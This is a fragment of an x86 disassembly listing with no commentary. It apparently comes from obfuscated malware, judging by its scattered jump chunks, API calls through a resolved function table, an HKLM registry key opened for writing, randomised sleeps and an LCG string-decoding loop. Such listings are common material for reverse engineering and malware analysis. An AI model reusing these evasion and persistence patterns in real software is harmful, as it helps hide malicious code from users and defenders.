pop edx
call sub_9B1B20
push 5
mov edx, off_9B9076
mov ecx, 4
call sub_9B1B20
mov dword_9BBE3C, ebx
jmp off_9BAAC0
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
mov edi, edi
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9ABE84 proc near ; CODE XREF: .text:009AE318�p
; sub_9B1584-1C4B�p ...
var_224 = byte ptr -224h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
arg_0 = dword ptr 8
; FUNCTION CHUNK AT 009B12BB SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009B4918 SIZE 00000029 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9BB08B
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 214h
mov eax, dword_9B8788
xor eax, ebp
mov [ebp+var_1C], eax
push ebx
push esi
push edi
mov [ebp+var_18], esp
mov [ebp+var_4], 0
push [ebp+arg_0]
pop eax
push eax
lea esi, [ebp+var_224]
call sub_9B3BE8
mov ecx, dword_9BCB74
mov edx, [ecx]
push esi
pop eax
push eax
call dword ptr [edx+5Ch]
cmp eax, 0FFFFFFFFh
jz loc_9B12BB
jmp off_9B8D96
sub_9ABE84 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B2830
loc_9ABEF0: ; CODE XREF: sub_9B2830+102C�j
call sub_9B45AC
inc edi
sub edx, edx
div edi
mov edi, edx
mov [ebp-24h], edi
inc dword ptr [ebp-20h]
jmp loc_9B3852
; END OF FUNCTION CHUNK FOR sub_9B2830
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9ABF08 proc near ; CODE XREF: sub_9B2C70-55F5�p
; sub_9B1584-275D�p ...
; FUNCTION CHUNK AT 009ACCC8 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009AF200 SIZE 00000027 BYTES
; FUNCTION CHUNK AT 009B0B98 SIZE 00000026 BYTES
; FUNCTION CHUNK AT 009B131E SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B2BF0 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B355C SIZE 00000041 BYTES
push ebp
push esp
pop ebp
push 0FFFFFFFFh
push off_9B96BB
push off_9B8CBD
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 0Ch
push ebx
push esi
push edi
mov [ebp-18h], esp
sub edi, edi
mov [ebp-1Ch], edi
mov eax, 14h
mov [ebp-4], edi
call sub_9AF3E8
push eax
pop esi
mov [ebp-1Ch], esi
cmp esi, edi
jz loc_9AF21B
jmp off_9B926C
sub_9ABF08 endp
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9ABF58: ; CODE XREF: sub_9B0930+12C2�j
; DATA XREF: .text:off_9BB04C�o
push off_9BADEC
push dword ptr [eax]
pop ecx
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx]
mov [ecx+90h], eax
push dword_9BCB74
pop edx
push dword ptr [edx]
pop eax
mov ecx, [eax+90h]
or ecx, ecx
jz loc_9B23EF
jmp off_9B980F
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B04A8
loc_9ABF94: ; CODE XREF: sub_9B04A8-203F�j
push dword ptr [ebp-4028h]
pop ecx
push dword ptr [ebp-4050h]
pop eax
cmp ecx, [eax+14h]
jnz loc_9B27C0
jmp off_9BA60D
; END OF FUNCTION CHUNK FOR sub_9B04A8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9ADAC4
loc_9ABFB4: ; CODE XREF: sub_9ADAC4+52EC�j
; DATA XREF: .text:off_9BA66F�o
call sub_9B31A8
loc_9ABFB9: ; CODE XREF: sub_9ADAC4+52E6�j
inc esi
jmp loc_9AB8F0
; END OF FUNCTION CHUNK FOR sub_9ADAC4
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9ABFC0: ; CODE XREF: sub_9B03E8+52E0�j
mov cl, [ebp-0B8h]
mov byte ptr dword_9BF384+2, cl
mov dl, [ebp-0B6h]
mov byte ptr dword_9BF384+3, dl
test byte ptr [ebp-0B4h], 10h
jz loc_9B21FA
jmp off_9BAA7F
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B037C
loc_9ABFEC: ; CODE XREF: sub_9B037C+2794�j
lea edx, [ebp-404Ch]
push edx
push edi
push 11h
lea eax, [ebp-402Ch]
push eax
lea ecx, [ebp-403Ch]
push ecx
push dword ptr [ebp-4054h]
pop edx
push edx
lea ecx, [ebp-201Ch]
lea edx, [ebp-401Ch]
call sub_9B3864
mov eax, [ebp-404Ch]
or eax, eax
jz loc_9AB9A8
jmp loc_9ACCFC
; END OF FUNCTION CHUNK FOR sub_9B037C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9AB1A0
loc_9AC030: ; CODE XREF: sub_9AB1A0+46CA�j
call sub_9B45AC
sub edx, edx
div dword_9BEBD0
mov esi, dword_9BCBCC[edx*4]
mov [ebp-1Ch], esi
jmp loc_9ACF74
; END OF FUNCTION CHUNK FOR sub_9AB1A0
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AC04C: ; CODE XREF: sub_9B0930+4E7C�j
; DATA XREF: .text:off_9B9974�o
push off_9BA880
mov ecx, [eax]
push ecx
call esi
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop ecx
mov [ecx+10h], eax
push dword_9BCB74
pop edx
push dword ptr [edx+10h]
pop eax
mov ecx, [eax+10h]
or ecx, ecx
jz loc_9B23EF
jmp loc_9ADC44
; ---------------------------------------------------------------------------
loc_9AC080: ; CODE XREF: sub_9B0930+2EB0�j
; DATA XREF: .text:off_9BA1C8�o
push off_9B87A0
push dword ptr [eax]
pop ecx
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx]
mov [ecx+68h], eax
mov edx, dword_9BCB74
mov eax, [edx]
mov ecx, [eax+68h]
and ecx, ecx
jz loc_9B23EF
jmp loc_9B2584
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B4950
loc_9AC0B0: ; CODE XREF: sub_9B4950+A5�j
; DATA XREF: .text:off_9B8941�o
call sub_9B6264
and eax, eax
jz loc_9AD3C4
jmp off_9B9E4D
; END OF FUNCTION CHUNK FOR sub_9B4950
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3B1C
loc_9AC0C4: ; CODE XREF: sub_9B3B1C-2741�j
; DATA XREF: .text:off_9B99AF�o
mov edi, off_9B985C
mov ecx, 801h
rep stosd
push 6
mov ecx, 2004h
push off_9B985C
pop edx
call sub_9B1B20
jmp loc_9B1D3F
; END OF FUNCTION CHUNK FOR sub_9B3B1C
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AC0EC: ; CODE XREF: sub_9B0930-4450�j
push off_9BAB7C
push dword ptr [eax]
pop ecx
push ecx
call esi
mov edx, dword_9BCB74
mov ecx, [edx]
mov [ecx+88h], eax
mov edx, dword_9BCB74
mov eax, [edx]
push dword ptr [eax+88h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B96B7
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
push 1
pop eax
retn
; =============== S U B R O U T I N E =======================================
sub_9AC128 proc near ; CODE XREF: sub_9ACA48+68�p
; sub_9B1A08-3CAE�p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009AFA8C SIZE 00000027 BYTES
; FUNCTION CHUNK AT 009B5E2C SIZE 0000001E BYTES
push ecx
or eax, eax
jz loc_9AFAA6
jmp loc_9AFA8C
sub_9AC128 endp
; ---------------------------------------------------------------------------
align 4
mov esp, [ebp-18h]
; START OF FUNCTION CHUNK FOR sub_9B2E04
loc_9AC13B: ; CODE XREF: sub_9B2E04-77C2�j
; sub_9B2E04-6C5�j ...
mov [ebp+var_4], 0FFFFFFFFh
mov ecx, dword_9BCB74
mov edx, [ecx]
push 0
call dword ptr [edx+60h]
sub eax, eax
push [ebp+var_10]
pop ecx
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov ecx, [ebp+var_1C]
xor ecx, ebp
call sub_9AAAC1
mov esp, ebp
pop ebp
retn 4
; END OF FUNCTION CHUNK FOR sub_9B2E04
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AC170 proc near ; CODE XREF: sub_9B6078+41�j
; DATA XREF: .text:off_9B900C�o
; FUNCTION CHUNK AT 009B5A4C SIZE 00000010 BYTES
push ebx
pop edi
dec edi
loc_9AC173: ; CODE XREF: sub_9AC170+9�j
mov al, [edi+1]
inc edi
and al, al
jnz short loc_9AC173
jmp off_9B8C2E
sub_9AC170 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AD97C
loc_9AC184: ; CODE XREF: sub_9AD97C+1F26�j
; DATA XREF: .text:off_9B9E44�o
mov dword ptr [ebp-20h], 1
loc_9AC18B: ; CODE XREF: sub_9AD97C+1F20�j
; sub_9AD97C+786B�j
push dword ptr [ebp-1Ch]
pop eax
cmp eax, esi
jz loc_9B454B
jmp off_9BAADC
; END OF FUNCTION CHUNK FOR sub_9AD97C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1B20
loc_9AC1A0: ; CODE XREF: sub_9B1B20+1746�j
mov [ebp+var_330], 1
loc_9AC1AA: ; CODE XREF: sub_9B1B20+1740�j
mov ecx, dword_9BCB74
push dword ptr [ecx+0Ch]
pop edx
mov eax, [ebp+var_32C]
push eax
call dword ptr [edx+14h]
loc_9AC1BE: ; CODE XREF: sub_9B1B20-D65�j
push dword_9BCB74
pop ecx
push dword ptr [ecx+0Ch]
pop edx
lea eax, [ebp+var_32C]
push eax
push 20006h
push 0
lea ecx, [ebp+var_224]
push ecx
push 80000002h
call dword ptr [edx+20h]
test eax, eax
jnz loc_9B193F
jmp loc_9AEF4C
; END OF FUNCTION CHUNK FOR sub_9B1B20
; ---------------------------------------------------------------------------
align 4
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AE860
loc_9AC1FC: ; CODE XREF: sub_9AE860+2A�j
; DATA XREF: .text:off_9B907E�o
mov [ebp+var_4], 0
push [ebp+arg_0]
pop eax
loc_9AC207: ; CODE XREF: sub_9AE860+276A�j
push [ebp+arg_4]
pop ecx
mov edx, ecx
dec ecx
or edx, edx
mov [ebp+arg_4], ecx
jz loc_9AF738
jmp loc_9B0FBC
; END OF FUNCTION CHUNK FOR sub_9AE860
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AC220: ; CODE XREF: sub_9B1D80-109F�j
; DATA XREF: .text:off_9BACE8�o
push dword ptr [ebp-2040h]
pop esi
test esi, esi
jz loc_9AB0A2
jmp loc_9B46A4
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9AC234: ; CODE XREF: sub_9B649C-3351�j
movzx ecx, byte ptr [esi+eax]
mov [ebp+var_2C], ecx
inc eax
mov [ebp+var_1C], eax
test cl, 0E0h
jnz loc_9ACCD8
jmp loc_9B4144
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AC250 proc near ; CODE XREF: sub_9B1A08-4417�p
; sub_9B1F68-3EEA�p ...
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 009AB264 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009AB2D8 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009AD774 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AF174 SIZE 0000000D BYTES
; FUNCTION CHUNK AT 009B0F50 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 009B137C SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B3680 SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009B393C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B5368 SIZE 000000B0 BYTES
; FUNCTION CHUNK AT 009B5528 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B594C SIZE 0000002A BYTES
mov edx, esi
sub ecx, ecx
mov [edx], ecx
mov [edx+4], ecx
push ebx
mov [edx+8], ecx
push ebp
mov [edx+0Ch], ecx
not eax
push edi
loc_9AC264: ; CODE XREF: sub_9AC250-F76�j
; sub_9AC250+CE�j ...
push 15A4E35h
pop ecx
mul ecx
add eax, 1
adc edx, 0
xor [esi], dx
mov edx, ecx
mul edx
add eax, 1
adc edx, 0
shr edx, 1
xor [esi+4], dx
mul ecx
add eax, 1
adc edx, 0
shr edx, 2
xor [esi], dx
mov edx, ecx
mul edx
add eax, 1
adc edx, 0
shr edx, 3
xor [esi+4], dx
mul ecx
add eax, 1
adc edx, 0
shr edx, 4
xor [esi], dx
push ecx
pop edx
mul edx
add eax, 1
adc edx, 0
shr edx, 5
xor [esi+4], dx
mul ecx
add eax, 1
adc edx, 0
shr edx, 6
xor [esi], dx
push ecx
pop edx
mul edx
add eax, 1
adc edx, 0
shr edx, 7
xor [esi+4], dx
mul ecx
add eax, 1
adc edx, 0
shr edx, 8
xor [esi], dx
mov edx, ecx
mul edx
add eax, 1
adc edx, 0
shr edx, 9
xor [esi+4], dx
mov edi, [esi]
mov ebx, 1
mov edx, edi
shr edx, 5
mov ecx, edx
and ecx, 1Fh
shl ebx, cl
shr edx, 5
test dword_9BA4E8[edx*4], ebx
jnz loc_9AC264
jmp loc_9B3680
sub_9AC250 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AC32C proc near ; CODE XREF: sub_9AD11C-1801�p
; sub_9ABD30+19�p ...
var_314 = dword ptr -314h
var_310 = dword ptr -310h
var_30C = dword ptr -30Ch
var_308 = dword ptr -308h
var_208 = dword ptr -208h
var_204 = dword ptr -204h
var_104 = dword ptr -104h
var_100 = dword ptr -100h
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 009AB488 SIZE 00000061 BYTES
; FUNCTION CHUNK AT 009ABABC SIZE 0000001E BYTES
; FUNCTION CHUNK AT 009AC35C SIZE 00000023 BYTES
; FUNCTION CHUNK AT 009AC5F8 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009AD0F8 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 009AD280 SIZE 00000020 BYTES
; FUNCTION CHUNK AT 009ADE10 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009AEF90 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B0708 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B3DA4 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B4124 SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B5034 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B5E20 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B61AC SIZE 00000011 BYTES
mov ecx, [esp+arg_0]
sub esp, 314h
push ebx
push ebp
push esi
mov esi, eax
and esi, 8
push edi
mov edx, 1
jz loc_9B0710
jmp loc_9B0708
sub_9AC32C endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9AC350: ; CODE XREF: sub_9AC6DC+4E9F�j
mov eax, 64h
jmp loc_9B004C
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9AC35C: ; CODE XREF: sub_9AC32C+2C6F�j
mov ecx, dword_9BCB74
mov edx, [ecx+10h]
lea eax, [esp+324h+var_104]
push eax
push esi
call dword ptr [edx+58h]
test eax, eax
jz loc_9AD0FB
jmp off_9B87AC
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B1A08
loc_9AC380: ; CODE XREF: sub_9B1A08-43DB�j
call sub_9B45AC
sub edx, edx
push 64h
pop ecx
div ecx
or edx, edx
jnz loc_9B351C
jmp off_9B9785
; END OF FUNCTION CHUNK FOR sub_9B1A08
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B3150
loc_9AC39C: ; CODE XREF: sub_9B3150-45CC�j
mov ecx, [ebx]
cmp ecx, 340h
jbe loc_9AEFA3
jmp loc_9B0094
; END OF FUNCTION CHUNK FOR sub_9B3150
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B649C
loc_9AC3B0: ; CODE XREF: sub_9B649C-55C0�j
xor ebx, ebx
mov bx, [esi+8]
mov eax, 0Ah
mov [ebp+var_28], ebx
test bl, 8
mov [ebp+var_1C], eax
jz loc_9B329E
jmp loc_9B3298
; END OF FUNCTION CHUNK FOR sub_9B649C
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AC6DC
loc_9AC3D0: ; CODE XREF: sub_9AC6DC+47�j
; sub_9AC6DC+74B2�j
mov dword_9BBD10, ebx
mov dword_9BBD14, ebx
mov eax, ebx
loc_9AC3DE: ; CODE XREF: sub_9AC6DC-BCD�j
push dword_9BBD1C
pop edi
cmp ebx, edi
jb loc_9ABAA4
jmp off_9B91CC
; END OF FUNCTION CHUNK FOR sub_9AC6DC
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B03E8
loc_9AC3F4: ; CODE XREF: sub_9B03E8-4A4�j
; DATA XREF: .text:off_9B89A2�o
mov edx, dword_9BF380
or edx, 4
mov word ptr dword_9BF380, dx
loc_9AC404: ; CODE XREF: sub_9B03E8-4AA�j
; sub_9B03E8+52DA�j
call sub_9B562C
mov word ptr dword_9BF388, ax
or esi, 0FFFFFFFFh
mov dword_9BF390+2, esi
mov word ptr dword_9BF394+2, 0
mov word_9BF398, si
push 9
mov edx, 9BF38Ah
mov ecx, 4
call sub_9B4480
and eax, eax
jnz loc_9AF0F0
jmp loc_9AF0D4
; END OF FUNCTION CHUNK FOR sub_9B03E8
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
sub_9AC448 proc near ; CODE XREF: sub_9B3408-7CD1�p
; sub_9B5480:loc_9AB858�p ...
; FUNCTION CHUNK AT 009B5928 SIZE 00000011 BYTES
test eax, eax
jz nullsub_6
jmp off_9BABE7
sub_9AC448 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B1D80
loc_9AC458: ; CODE XREF: sub_9B1D80-55DF�j
push dword ptr [ebp-2040h]
pop eax
test eax, eax
jz loc_9AE945
jmp off_9BA4E1
; END OF FUNCTION CHUNK FOR sub_9B1D80
; ---------------------------------------------------------------------------
align 10h
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BAD92
call dword ptr [ecx+68h]
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9B36E8
loc_9AC484: ; CODE XREF: sub_9B36E8+1C56�j
or esi, 80000000h
mov [ebp-1Ch], esi
loc_9AC48D: ; CODE XREF: sub_9B36E8+58�j
; sub_9B36E8+1C50�j
test esi, 7FFFFFFFh
jz loc_9ACE6D
jmp loc_9ADF98
; END OF FUNCTION CHUNK FOR sub_9B36E8
; ---------------------------------------------------------------------------
align 10h
push edi
mov ecx, 40h
mov edi, edx
sub eax, eax
rep stosd
stosw
pop edi
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AC4B0: ; CODE XREF: sub_9B0930-23F5�j
; DATA XREF: .text:off_9BAF5B�o
push off_9B979B
mov eax, [eax]
push eax
call esi
mov ecx, dword_9BCB74
mov edx, [ecx]
mov [edx+84h], eax
mov eax, dword_9BCB74
push dword ptr [eax]
pop eax
push dword ptr [eax+84h]
pop ecx
and ecx, ecx
jz loc_9B23EF
jmp loc_9AC0EC
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AF25C
loc_9AC4E8: ; CODE XREF: sub_9AF25C+6E08�j
; DATA XREF: .text:off_9BAF0E�o
pop edx
call sub_9B1B20
push 5
push 4
pop ecx
mov edx, off_9B9076
call sub_9B1B20
mov ecx, off_9B9844
call sub_9B5480
mov dword_9BBE3C, esi
mov [ebp+8], ebx
call sub_9AFF64
lea ecx, [ebp+8]
call sub_9B5480
jmp loc_9B33DB
; END OF FUNCTION CHUNK FOR sub_9AF25C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B5904
loc_9AC524: ; CODE XREF: sub_9B5904-59DE�j
lea edx, [esi+esi*4]
shl edx, 3
mov dword_9BEC1C[edx], 1
mov dword_9BEC2C[edx], ebx
mov dword_9BEC30[edx], edi
push ebx
pop eax
call sub_9B327C
cmp esi, 0FFFFFFFFh
mov dword_9BEC28[edx], eax
jz loc_9B42FE
jmp off_9BADF0
; END OF FUNCTION CHUNK FOR sub_9B5904
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ADDA4
loc_9AC55C: ; CODE XREF: sub_9ADDA4:loc_9B1C08�j
; DATA XREF: .text:009B2B20�o
mov ecx, [ebp-278h]
mov eax, ecx
cdq
mov edi, eax
xor edi, edx
sub edi, edx
push dword ptr [ebp-27Ch]
pop esi
mov eax, esi
cdq
xor eax, edx
sub eax, edx
cmp eax, edi
push esi
pop eax
jl loc_9B2262
jmp loc_9B2260
; END OF FUNCTION CHUNK FOR sub_9ADDA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B0930
loc_9AC588: ; CODE XREF: sub_9B0930+7F�j
push off_9B92FC
push dword ptr [eax]
pop ecx
push ecx
call esi
push dword_9BCB74
pop edx
mov ecx, [edx+10h]
mov [ecx+60h], eax
push dword_9BCB74
pop eax
push dword ptr [eax+10h]
pop edx
push dword ptr [edx+60h]
pop ecx
test ecx, ecx
jz loc_9B23EF
jmp off_9B88A6
; END OF FUNCTION CHUNK FOR sub_9B0930
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9B63D8
loc_9AC5C0: ; CODE XREF: sub_9B63D8-A9C2�j
; sub_9B63D8-986A�j ...
mov ebx, [ebp-2128h]
push dword ptr [ebp-2124h]
pop ecx
loc_9AC5CD: ; CODE XREF: sub_9B63D8-9ADE�j
; sub_9B63D8-80E5�j
cmp ecx, 0FFFFFFFFh
jz loc_9AED08
jmp loc_9B1E18
; END OF FUNCTION CHUNK FOR sub_9B63D8
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AB040
loc_9AC5DC: ; CODE XREF: sub_9AB040+23�j
push dword_9BEC20[eax]
pop ecx
and ecx, ecx
jz loc_9B6548
jmp loc_9B0D90
; END OF FUNCTION CHUNK FOR sub_9AB040
; ---------------------------------------------------------------------------
mov eax, 1
retn
; ---------------------------------------------------------------------------
align 4
; START OF FUNCTION CHUNK FOR sub_9AC32C
loc_9AC5F8: ; CODE XREF: sub_9AC32C+DD9�j
; sub_9AC32C+9E86�j
push 1
pop eax
loc_9AC5FB: ; CODE XREF: sub_9AC32C+DD3�j
pop edi
pop esi
pop ebp
pop ebx
add esp, 314h
retn 8
; END OF FUNCTION CHUNK FOR sub_9AC32C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B3864
loc_9AC608: ; CODE XREF: sub_9B3864+1277�j
; DATA XREF: .text:off_9B9E9B�o
mov edx, [ebp+var_204C]
test byte ptr [edx+8], 8
jz loc_9AEB8C
jmp off_9B9139
; END OF FUNCTION CHUNK FOR sub_9B3864
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_9AF030
loc_9AC620: ; CODE XREF: sub_9AF030+37F2�j
; sub_9AF030+614A�j
lea ecx, [ebp+var_1C]
call sub_9B5480
mov edi, [ebp+var_1C]
loc_9AC62B: ; CODE XREF: sub_9AF030+233F�j
; sub_9AF030+24F5�j ...
push [ebp+arg_0]
pop ecx
call sub_9B35A0
loc_9AC634: ; CODE XREF: sub_9AF030+5A�j
; sub_9AF030+45DA�j ...
mov [ebp+var_4], 0FFFFFFFFh
jmp loc_9AE8BD
; END OF FUNCTION CHUNK FOR sub_9AF030
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9B1F68
loc_9AC640: ; CODE XREF: sub_9B1F68-3F19�j
; sub_9B1F68+2927�j
; DATA XREF: ...
mov [ebp-48h], esi
push dword ptr [ebp-54h]
pop ecx
push ecx
mov edx, esi
call sub_9B5CDC
or eax, eax
jz loc_9B40B4
jmp loc_9AE84C
; END OF FUNCTION CHUNK FOR sub_9B1F68
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_9ACEE8
loc_9AC65C: ; CODE XREF: sub_9ACEE8+5DB6�j
; sub_9ACEE8+65D9�j
mov edx, dword_9BCB74
mov esi, [edx]
call sub_9B45AC
push 15F90h
pop ecx
xor edx, edx
div ecx
add edx, 7530h
push edx
call dword ptr [esi+4]
xor ecx, ecx
mov [ebp-0DCh], ecx
sub eax, eax
loc_9AC687: ; CODE XREF: sub_9ACEE8-137B�j
mov [ebp-0D8h], eax
cmp eax, 93h
jnb loc_9AB937
jmp loc_9AFF00
; END OF FUNCTION CHUNK FOR sub_9ACEE8
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_9AC6A0 proc near ; CODE XREF: sub_9B5100-9A42�p
; sub_9B4BF8-7012�p ...
var_11 = byte ptr -11h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 009AADB0 SIZE 00000006 BYTES
; FUNCTION CHUNK AT 009B4DC4 SIZE 000000D3 BYTES
sub esp, 14h
or eax, 0FFFFFFFFh
sub eax, esi
mov [esp+14h+var_8], eax
mov eax, 1
sub eax, esi
mov [esp+14h+var_4], eax
push ebx
mov eax, 0FFFFFFFEh
sub bl, bl
sub eax, esi
push ebp
push [esp+1Ch+arg_0]
pop ebp
mov [esp+1Ch+var_10], 2
lea ecx, [esi+2]
mov [esp+1Ch+var_C], eax
jmp loc_9B4DC8
sub_9AC6A0 endp
; ---------------------------------------------------------------------------
align 4
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_9AC6DC proc near ; CODE XREF: sub_9ACEE8+3453�p
; sub_9ACEE8+40C8�p
var_18 = dword ptr -18h
var_10 = dword ptr -10h
var_4 = dword ptr -4
; FUNCTION CHUNK AT 009ABAA4 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009ABAF0 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009AC350 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 009AC3D0 SIZE 00000023 BYTES
; FUNCTION CHUNK AT 009ACC74 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009AF003 SIZE 0000002B BYTES
; FUNCTION CHUNK AT 009AFC78 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009AFE48 SIZE 00000024 BYTES
; FUNCTION CHUNK AT 009B003C SIZE 00000029 BYTES
; FUNCTION CHUNK AT 009B1568 SIZE 00000018 BYTES
; FUNCTION CHUNK AT 009B182C SIZE 00000010 BYTES
; FUNCTION CHUNK AT 009B1E04 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B24CC SIZE 00000011 BYTES
; FUNCTION CHUNK AT 009B30B0 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B35E8 SIZE 00000015 BYTES
; FUNCTION CHUNK AT 009B3A68 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B3B8C SIZE 0000000E BYTES
; FUNCTION CHUNK AT 009B3F44 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B4D80 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 009B5090 SIZE 0000000F BYTES
; FUNCTION CHUNK AT 009B6188 SIZE 00000024 BYTES
push ebp
mov ebp, esp
push 0FFFFFFFFh
push off_9B99AB
push off_9B8CBD
push large dword ptr fs:0
pop eax
push eax
mov large fs:0, esp
sub esp, 8
push ebx
push esi
push edi
mov [ebp+var_18], esp
push edx
pop edi
mov esi, ecx
push dword_9BCB74
pop eax
mov ecx, [eax]
push off_9BAA6D
call dword ptr [ecx+18h]
xor ebx, ebx
cmp edi, ebx
mov [ebp+var_4], ebx
jz loc_9AC3D0
jmp off_9B974F
sub_9AC6DC endp
; ---------------------------------------------------------------------------
align 10h
mov esp, [ebp-18h]
mov dword ptr [ebp-4], 0FFFFFFFFh
push dword ptr [ebp-1Ch]
pop esi
; START OF FUNCTION CHUNK FOR sub_9B36E8
loc_9AC73E: ; CODE XREF: sub_9B36E8-6874�j
mov edx, dword_9BCB74
mov eax, [edx]
push off_9BADC8
call dword ptr [eax+1Ch]
mov ecx, [ebp-10h]
mov eax, esi
mov large fs:0, ecx
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
retn
; END OF FUNCTION CHUNK FOR sub_9B36E8
